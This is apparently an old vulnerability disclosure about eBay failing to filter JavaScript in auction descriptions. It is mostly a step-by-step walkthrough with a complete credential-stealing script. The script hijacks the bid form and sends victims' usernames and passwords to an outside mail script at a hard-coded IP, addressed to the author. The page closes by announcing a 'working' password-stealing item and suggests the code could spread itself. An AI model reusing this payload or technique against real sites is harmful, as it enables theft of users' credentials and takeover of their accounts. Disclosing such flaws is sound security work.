|
|
|
|
| |
| eBay (www.ebay.com) an online auction web site does not filter active JavaScript code in their auction items, allowing attackers a method to gain confidential information from unsuspecting customers. |
| |
Credit:
The vulnerability was found by: Blue Adept (www.because-we-can.com)
|
| |
A security hole allows malicious eBay users to easily steal passwords of other eBay users. The exploit involves posting items for a bid that include malicious JavaScripting code as part of the item's description.
When an unsuspecting eBay user places a bid on the item, the embedded JavaScript code sends their username and password to the malicious user via e-mail. From the victim's point of view, nothing unusual has occurred, so they are unlikely to report it.
Once a malicious user knows the username/password of the victim's eBay account, he can assume full control of the account, including the ability to:
* create new auctions (automatically charging the victim's account).
* place bids in the victim's name.
* retract legitimate bids in the victim's name.
* change the victim's username/password, barring them from eBay.
* associate bogus negative/positive comments with an arbitrary seller.
* prematurely close an auction being run by the victim.
* insert the ebayla code into the victim's auction (The code could be altered to do this automatically, which would constitute an ebayla virus).
The security problem is dangerously simple. A malicious user needs only to embed the JavaScript code into their description of an item for auction. A simple walk through of the exploit demonstrates step-by-step how any user can steal eBay passwords:
Step 1:
Visit eBay.com and register for a free user account.
Step 2:
Go to the seller's area to post an item for auction. When asked to enter the description of the item, post the following description, containing the ebayla code. The first line of the script indicates the email address to which usernames and passwords are to be sent.
<script>
recipient = "blue_adept@because-we-can.com";
function printframeset(place_bid, mailUrl, username, password){
document.open();
document.writeln('<script>');
document.writeln('function go(){');
document.writeln('top.b.document.open();');
document.writeln('top.b.document.writeln("<body onLoad=document.form1.submit()>");');
document.writeln('top.b.document.writeln("<form name=form1 method=POST action=' + mailUrl + '>");');
document.writeln('top.b.document.writeln("<input type=hidden name=username value=' + username + '>");');
document.writeln('top.b.document.writeln("<input type=hidden name=password value=' + password + '>");');
document.writeln('top.b.document.writeln("</form>")');
document.writeln('top.b.document.close();');
document.writeln('}');
document.writeln('</scr' + 'ipt>');
document.writeln('</head>');
document.writeln('<frameset rows="100%,*" onLoad="go()">');
document.writeln('<frame name="t" src="' + place_bid + '">');
document.writeln('<frame name="b" src="">');
document.writeln('</frameset>');
document.close();
}
function urlEncode(inStr) {
outStr=' '; //not '' for a NS bug!
for (i=0; i < inStr.length; i++) {
aChar=inStr.substring (i, i+1);
switch(aChar){
case '%': outStr += "%25"; break; case ',': outStr += "%2C"; break;
case '/': outStr += "%2F"; break; case ':': outStr += "%3A"; break;
case '~': outStr += "%7E"; break; case '!': outStr += "%21"; break;
case '"': outStr += "%22"; break; case '#': outStr += "%23"; break;
case '$': outStr += "%24"; break; case "'": outStr += "%27"; break;
case '`': outStr += "%60"; break; case '^': outStr += "%5E"; break;
case '&': outStr += "%26"; break; case '(': outStr += "%28"; break;
case ')': outStr += "%29"; break; case '+': outStr += "%2B"; break;
case '{': outStr += "%7B"; break; case '|': outStr += "%7C"; break;
case '}': outStr += "%7D"; break; case ';': outStr += "%3B"; break;
case '<': outStr += "%3C"; break; case '=': outStr += "%3D"; break;
case '>': outStr += "%3E"; break; case '?': outStr += "%3F"; break;
case '[': outStr += "%5B"; break; case '\\': outStr += "%5C"; break;
case ']': outStr += "%5D"; break; case ' ': outStr += "+"; break;
default: outStr += aChar;
}
}
return outStr.substring(1, outStr.length);
}
function newaction(){
window.document.forms[0].action="javascript:ebayla()";
}
function ebayla(){
item = urlEncode(window.document.forms[0].item.value);
username = urlEncode(window.document.forms[0].userid.value);
password = urlEncode(window.document.forms[0].pass.value);
maxbid = urlEncode(window.document.forms[0].maxbid.value);
bid_script = "http://cgi.ebay.com/aw-cgi/eBayISAPI.dll";
bid_query_string = "?MfcISAPICommand=MakeBid&item=" + item + "&userid=" + username
+ "&pass=" + password + "&maxbid=" + maxbid;
place_bid = bid_script + bid_query_string;
mailscript = "http://204.225.88.132/cgi-bin/form1";
mailUrl = mailscript + '?|' + recipient;
printframeset(place_bid, mailUrl, username, password);
}
if(document.links[11] != "http://pages.ebay.com/aw/account-status.html"){
setTimeout("newaction()", 1000);
}
</script>
Step 4:
Wait for users to place/review bids on the item. Shortly afterwards, you will receive an e-mail message that contains the user's username and password.
Note:
In the exploit code described above, the part of the program that does the actual "dirty-work" of mailing the password and username is a randomly chosen server-side mailing script we found on the web. There are many equivalent and publicly available server-side mailing programs that can be used in its place.
That's it. You now have a working eBay username and password stealing item.
Unfortunately, the potential security issues at eBay are difficult to spot and avoid. If you are unfamiliar with spotting suspicious JavaScript in the doc source of an html document, the best way to protect yourself may be to avoid using eBay until adequate HTML filters have been implemented.
This page demonstrates how the ebayla bug can be easily exploited to steal usernames and passwords from eBay users. The resources required to launch the attack are minimal and freely available. The following exploit is written to work with Netscape Communicator only. The goal is to demonstrate that using only the items listed below, a malicious user can acquire eBay usernames and passwords.
|
|
|
|
|
|
|
|
|
|
